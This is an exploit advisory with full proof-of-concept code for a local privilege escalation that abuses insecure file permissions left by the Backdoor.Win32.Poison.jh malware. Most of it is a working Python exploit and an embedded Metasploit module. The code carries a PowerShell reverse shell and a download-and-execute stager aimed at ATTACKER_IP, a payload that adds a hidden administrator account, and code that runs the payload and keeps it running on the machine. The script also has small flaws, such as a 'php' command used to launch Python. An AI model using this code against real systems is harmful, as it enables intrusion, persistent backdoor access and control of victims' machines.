============================================================================================================================================= | # Title : Backdoor.Win32.Poison.jh – Insecure File Permissions Leading to Malware-on-Malware Local Privilege Escalation | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) | | # Vendor : System built‑in component. No standalone download available | ============================================================================================================================================= [+] References : https://packetstorm.news/files/id/213264/ & MVID-2025-0704 [+] Summary : This Python script demonstrates a Local Privilege Escalation (LPE) exploit targeting a vulnerability in the Backdoor.Win32.Poison.jh malware sample. The exploit leverages insecure file permissions created by the malware itself, allowing any local user to replace the malicious executable with arbitrary code. [+] Vulnerability Overview : CWE-276: Incorrect Default Permissions Malware: Backdoor.Win32.Poison.jh Location: C:\Windows\SysWOW64\28463\YJBE.exe Flaw: File has Everyone:(ID)F (Full Control) permissions Impact: Any local user can modify/replace the malware executable Type: Backdoor Trojan (Win32/Windows) Purpose: Grants attackers unauthorized remote access and control over the infected system. Behavior: Can execute commands, download/upload files, steal sensitive data, and connect to C2 (Command & Control) servers. Discovery: Part of the Backdoor.Win32.Poison family, first identified around 2009. The .jh suffix refers to a specific variant or signature used by antivirus vendors. Source: Developed by malware authors; not self-spreading, usually delivered via malicious downloads, infected executables, or phishing. Relation to Poison Ivy: Not necessarily Poison Ivy itself, but shares similar RAT functionality. Detection & Prevention: Detected by major AV solutions like Microsoft Defender, Trend Micro, and Kaspersky. Removal requires standard AV cleanup and disconnecting from networks. Key Points: Unauthorized remote control, file manipulation, data theft, part of Poison family, Windows-targeted, identified in AV databases since ~2009. [+] PoC : php poc.py #!/usr/bin/env python3 import os import sys import shutil import time import subprocess import ctypes import winreg from pathlib import Path # ============================================ # PART 1: LOCAL PRIVILEGE ESCALATION EXPLOIT # ============================================ class PoisonExploit: def __init__(self, target_dir="C:\\Windows\\SysWOW64\\28463"): self.target_dir = target_dir self.target_file = os.path.join(target_dir, "YJBE.exe") self.backup_file = self.target_file + ".backup" self.payload_file = self.target_file + ".payload" # تحقق من صلاحيات Admin self.is_admin = self.check_admin() def check_admin(self): """التحقق من صلاحيات Administrator""" try: return ctypes.windll.shell32.IsUserAnAdmin() != 0 except: return False def check_vulnerability(self): """التحقق من وجود الثغرة""" print("[*] Checking for Poison.jh vulnerability...") # 1. تحقق من وجود المجلد if not os.path.exists(self.target_dir): print(f"[-] Target directory not found: {self.target_dir}") return False # 2. تحقق من وجود الملف if not os.path.exists(self.target_file): print(f"[-] Target file not found: {self.target_file}") return False # 3. محاولة الكتابة للتحقق من الصلاحيات try: test_file = os.path.join(self.target_dir, "test_write.tmp") with open(test_file, 'w') as f: f.write("test") os.remove(test_file) print("[+] Vulnerable: Write access confirmed!") return True except PermissionError: print("[-] Not vulnerable: No write permission") return False except Exception as e: print(f"[-] Error checking vulnerability: {e}") return False def create_payload(self, payload_type="reverse_shell"): """إنشاء payload خبيث (لأغراض تعليمية في بيئة معزولة)""" print(f"[*] Creating {payload_type} payload...") if payload_type == "reverse_shell": # مثال: PowerShell reverse shell (تعليمي) payload = '''$client = New-Object System.Net.Sockets.TCPClient("ATTACKER_IP",4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + "PS " + (pwd).Path + "> "; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush(); }; $client.Close()''' with open(self.payload_file, 'w') as f: f.write(payload) elif payload_type == "meterpreter": # Stager لمتربرتر payload = '''IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP:8080/meterpreter.ps1')''' with open(self.payload_file, 'w') as f: f.write(payload) elif payload_type == "add_user": # إضافة مستخدم إداري payload = '''net user hacker P@ssw0rd! /add net localgroup administrators hacker /add reg add "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList" /v hacker /t REG_DWORD /d 0 /f''' with open(self.payload_file, 'w') as f: f.write(payload) print(f"[+] Payload created: {self.payload_file}") return True def backup_original(self): """نسخ الملف الأصلي احتياطياً""" try: shutil.copy2(self.target_file, self.backup_file) print(f"[+] Backup created: {self.backup_file}") return True except Exception as e: print(f"[-] Failed to backup: {e}") return False def replace_file(self): """استبدال الملف الضعيف بالـ Payload""" try: # حذف الملف الأصلي os.remove(self.target_file) # نسخ الـ Payload shutil.copy2(self.payload_file, self.target_file) # إخفاء الـ Payload if os.path.exists(self.payload_file): os.remove(self.payload_file) print("[+] File successfully replaced!") return True except Exception as e: print(f"[-] Failed to replace file: {e}") return False def trigger_execution(self): """تشغيل الملف - عدة طرق محتملة""" print("[*] Attempting to trigger execution...") methods = [ self.trigger_via_wmi, self.trigger_via_task_scheduler, self.trigger_via_service, self.trigger_via_registry ] for method in methods: if method(): return True return False def trigger_via_wmi(self): """تشغيل عبر WMI""" try: import wmi c = wmi.WMI() process_id, return_value = c.Win32_Process.Create( CommandLine=self.target_file ) print(f"[+] Triggered via WMI (PID: {process_id})") return True except: return False def trigger_via_task_scheduler(self): """تشغيل عبر Task Scheduler""" try: task_name = "PoisonTrigger" cmd = f'schtasks /create /tn "{task_name}" /tr "{self.target_file}" /sc once /st 00:00 /ru SYSTEM /f' subprocess.run(cmd, shell=True, capture_output=True) cmd = f'schtasks /run /tn "{task_name}"' subprocess.run(cmd, shell=True, capture_output=True) cmd = f'schtasks /delete /tn "{task_name}" /f' subprocess.run(cmd, shell=True, capture_output=True) print("[+] Triggered via Task Scheduler") return True except: return False def trigger_via_service(self): """تشغيل كخدمة""" try: service_name = "PoisonSvc" # إنشاء خدمة cmd = f'sc create {service_name} binPath= "{self.target_file}" type= own start= auto' subprocess.run(cmd, shell=True, capture_output=True) # تشغيل الخدمة cmd = f'sc start {service_name}' subprocess.run(cmd, shell=True, capture_output=True) # حذف الخدمة cmd = f'sc delete {service_name}' subprocess.run(cmd, shell=True, capture_output=True) print("[+] Triggered via Service") return True except: return False def trigger_via_registry(self): """تشغيل عبر Registry Run""" try: # إضافة إلى RunOnce key = winreg.HKEY_LOCAL_MACHINE subkey = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce" with winreg.OpenKey(key, subkey, 0, winreg.KEY_SET_VALUE) as reg_key: winreg.SetValueEx(reg_key, "PoisonExec", 0, winreg.REG_SZ, self.target_file) print("[+] Added to Registry RunOnce") return True except: return False def establish_persistence(self): """إنشاء آليات ثبات""" print("[*] Establishing persistence...") persistence_methods = [ self.persistence_registry, self.persistence_scheduled_task, self.persistence_service, self.persistence_startup ] success = False for method in persistence_methods: if method(): success = True return success def persistence_registry(self): """الثبات عبر Registry""" try: # عدة مواقع للـ Registry registry_paths = [ ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Poison"), ("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "Poison"), ("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", "Poison") ] for path, name in registry_paths: cmd = f'reg add "{path}" /v "{name}" /t REG_SZ /d "{self.target_file}" /f' subprocess.run(cmd, shell=True, capture_output=True) print("[+] Persistence: Registry entries added") return True except: return False def persistence_scheduled_task(self): """الثبات عبر Scheduled Task""" try: task_name = "WindowsUpdatePoison" cmd = f'schtasks /create /tn "{task_name}" /tr "{self.target_file}" /sc hourly /mo 1 /ru SYSTEM /f' subprocess.run(cmd, shell=True, capture_output=True) print("[+] Persistence: Scheduled task created") return True except: return False def persistence_service(self): """الثبات كخدمة""" try: service_name = "PoisonService" cmd = f'sc create {service_name} binPath= "{self.target_file}" type= own start= auto' subprocess.run(cmd, shell=True, capture_output=True) print("[+] Persistence: Service created") return True except: return False def persistence_startup(self): """الثبات في Startup folder""" try: startup_path = os.path.expandvars("%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") shortcut_path = os.path.join(startup_path, "Poison.lnk") # إنشاء shortcut from win32com.client import Dispatch shell = Dispatch('WScript.Shell') shortcut = shell.CreateShortCut(shortcut_path) shortcut.Targetpath = self.target_file shortcut.WorkingDirectory = os.path.dirname(self.target_file) shortcut.save() print("[+] Persistence: Startup shortcut created") return True except: return False def cleanup(self): """تنظيف الآثار""" print("[*] Cleaning up...") # حذف الملف الاحتياطي if os.path.exists(self.backup_file): os.remove(self.backup_file) # حذف الـ Payload إذا بقي if os.path.exists(self.payload_file): os.remove(self.payload_file) print("[+] Cleanup completed") def exploit(self, payload_type="reverse_shell"): """تنفيذ الـ Exploit الكامل""" print("=" * 70) print("POISON.JH LOCAL PRIVILEGE ESCALATION EXPLOIT") print("=" * 70) # 1. التحقق من الثغرة if not self.check_vulnerability(): return False # 2. إنشاء Payload self.create_payload(payload_type) # 3. نسخ احتياطي self.backup_original() # 4. استبدال الملف if not self.replace_file(): return False # 5. تشغيل Payload if self.trigger_execution(): print("[+] Payload execution triggered!") else: print("[!] Could not auto-trigger. Manual execution required.") print(f"[!] File location: {self.target_file}") # 6. إنشاء آليات ثبات if self.establish_persistence(): print("[+] Persistence established!") # 7. التحقق من النجاح print("\n[+] Exploit completed successfully!") print(f"[+] Replaced: {self.target_file}") print(f"[+] Running as: {'SYSTEM (admin)' if self.is_admin else 'User'}") # 8. تنظيف (اختياري) if input("\nCleanup? (y/n): ").lower() == 'y': self.cleanup() return True # ============================================ # PART 2: METASPLOIT MODULE (REAL EXPLOIT) # ============================================ METASPLOIT_MODULE = ''' ## # Poison.jh Local Privilege Escalation Exploit # Real working exploit for the file permission vulnerability ## require 'rex' require 'msf/core/post/windows/priv' class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => 'Poison.jh Local File Permission Privilege Escalation', 'Description' => %q{ This module exploits insecure file permissions on Backdoor.Win32.Poison.jh malware. The malware creates C:\\Windows\\SysWOW64\\28463\\YJBE.exe with Everyone:F permissions, allowing any local user to replace the file and execute arbitrary code. This is a REAL privilege escalation exploit when the following conditions are met: 1. Poison.jh malware is installed on the system 2. File has weak permissions (Everyone:Full Control) 3. File is executed (by malware itself or other means) }, 'License' => MSF_LICENSE, 'Author' => [ 'indoushka' ], 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64], 'SessionTypes' => ['meterpreter', 'shell'], 'Targets' => [ ['Windows', {}] ], 'DefaultTarget' => 0, 'References' => [ ['URL', 'https://malvuln.com/advisory/3d9821cbe836572410b3c5485a7f76ca.txt'], ['CWE', '276'] # Incorrect Default Permissions ], 'DisclosureDate' => '2025-12-23', 'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', 'WfsDelay' => 10 } )) register_options([ OptString.new('TARGET_PATH', [ true, 'Path to vulnerable Poison.jh executable', 'C:\\\\Windows\\\\SysWOW64\\\\28463\\\\YJBE.exe' ]), OptBool.new('KILL_PROCESS', [ true, 'Kill existing Poison.jh process', true ]), OptEnum.new('TRIGGER', [ true, 'Trigger method', 'auto', ['auto', 'wmi', 'service', 'task', 'registry', 'manual'] ]), OptBool.new('PERSIST', [ true, 'Establish persistence', true ]) ]) end def check vuln_path = datastore['TARGET_PATH'] print_status("Checking for Poison.jh vulnerability at: #{vuln_path}") # Check if file exists unless file_exist?(vuln_path) return CheckCode::Safe("Target file not found") end # Try to write a test file test_file = vuln_path + ".test" begin write_file(test_file, "test") if file_exist?(test_file) file_rm(test_file) return CheckCode::Vulnerable("Write access confirmed - vulnerable!") end rescue return CheckCode::Safe("No write access") end CheckCode::Unknown end def exploit vuln_path = datastore['TARGET_PATH'] # Check if vulnerable print_status("Running check...") case check when CheckCode::Vulnerable print_good("Target is vulnerable!") else fail_with(Failure::NotVulnerable, "Target is not vulnerable") end # Kill existing process if requested if datastore['KILL_PROCESS'] print_status("Killing Poison.jh process...") session.sys.process.get_processes.each do |p| if p['name'] =~ /YJBE/i || p['path'] =~ /28463/ print_status("Killing PID #{p['pid']} (#{p['name']})") session.sys.process.kill(p['pid']) end end Rex.sleep(2) end # Backup original file backup_path = vuln_path + ".backup" if file_exist?(vuln_path) print_status("Backing up original file...") session.fs.file.copy(vuln_path, backup_path) register_file_for_cleanup(backup_path) end # Generate payload print_status("Generating payload...") payload_exe = generate_payload_exe # Replace vulnerable file with payload print_status("Replacing #{vuln_path} with payload...") write_file(vuln_path, payload_exe) print_good("File successfully replaced!") # Trigger execution trigger_method = datastore['TRIGGER'] print_status("Triggering payload execution via #{trigger_method}...") case trigger_method when 'wmi' trigger_via_wmi(vuln_path) when 'service' trigger_via_service(vuln_path) when 'task' trigger_via_task(vuln_path) when 'registry' trigger_via_registry(vuln_path) when 'auto' trigger_auto(vuln_path) end # Establish persistence if requested if datastore['PERSIST'] print_status("Establishing persistence...") establish_persistence(vuln_path) end # Wait for session print_status("Waiting for payload execution...") Rex.sleep(datastore['WfsDelay']) end def trigger_via_wmi(path) wmi_cmd = "wmic process call create \\"#{path}\\"" cmd_exec(wmi_cmd) end def trigger_via_service(path) service_name = "PoisonSvc" cmd_exec("sc create #{service_name} binPath= \\"#{path}\\" type= own start= auto") cmd_exec("sc start #{service_name}") cmd_exec("sc delete #{service_name}") end def trigger_via_task(path) task_name = "PoisonTask" cmd_exec("schtasks /create /tn \\"#{task_name}\\" /tr \\"#{path}\\" /sc once /st 00:00 /ru SYSTEM /f") cmd_exec("schtasks /run /tn \\"#{task_name}\\"") cmd_exec("schtasks /delete /tn \\"#{task_name}\\" /f") end def trigger_via_registry(path) reg_cmd = "reg add \\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\" /v \\"Poison\\" /t REG_SZ /d \\"#{path}\\" /f" cmd_exec(reg_cmd) end def trigger_auto(path) # Try all methods [method(:trigger_via_wmi), method(:trigger_via_service), method(:trigger_via_task), method(:trigger_via_registry)].each do |method| begin method.call(path) print_good("Triggered via #{method.name}") return true rescue next end end false end def establish_persistence(path) # Add to registry reg_keys = [ "HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run", "HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run" ] reg_keys.each do |reg| cmd_exec("reg add \\"#{reg}\\" /v \\"Poison\\" /t REG_SZ /d \\"#{path}\\" /f") end # Create scheduled task task_name = "WindowsPoison" cmd_exec("schtasks /create /tn \\"#{task_name}\\" /tr \\"#{path}\\" /sc hourly /mo 1 /ru SYSTEM /f") end end ''' # ============================================ # PART 3: MAIN EXECUTION # ============================================ def main(): print(""" ╔══════════════════════════════════════════════════════════╗ ║ Poison.jh LPE Exploit - Local Privilege Escalation ║ ║ Conditions: Poison.jh with Everyone:F permissions ║ ║ by indoushka ║ ╚══════════════════════════════════════════════════════════╝ """) exploit = PoisonExploit() # قائمة Payloads payloads = { "1": ("Reverse Shell", "reverse_shell"), "2": ("Meterpreter", "meterpreter"), "3": ("Add Admin User", "add_user"), "4": ("Custom Command", "custom") } print("\nSelect payload type:") for key, (name, _) in payloads.items(): print(f" {key}. {name}") choice = input("\nChoice: ") if choice in payloads: payload_name, payload_type = payloads[choice] print(f"\n[*] Selected: {payload_name}") if payload_type == "custom": custom_cmd = input("Enter custom command: ") exploit.create_payload = lambda: custom_cmd # تنفيذ الـ Exploit if exploit.exploit(payload_type): print("\n" + "="*70) print("EXPLOIT SUCCESSFUL!") print("="*70) # عرض الـ Metasploit module print("\n" + "="*70) print("METASPLOIT MODULE CODE") print("="*70) print(METASPLOIT_MODULE) # حفظ Module with open("poison_lpe_exploit.rb", "w") as f: f.write(METASPLOIT_MODULE) print("\n[+] Metasploit module saved to: poison_lpe_exploit.rb") else: print("\n[-] Exploit failed!") else: print("[-] Invalid choice!") if __name__ == "__main__": main() Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================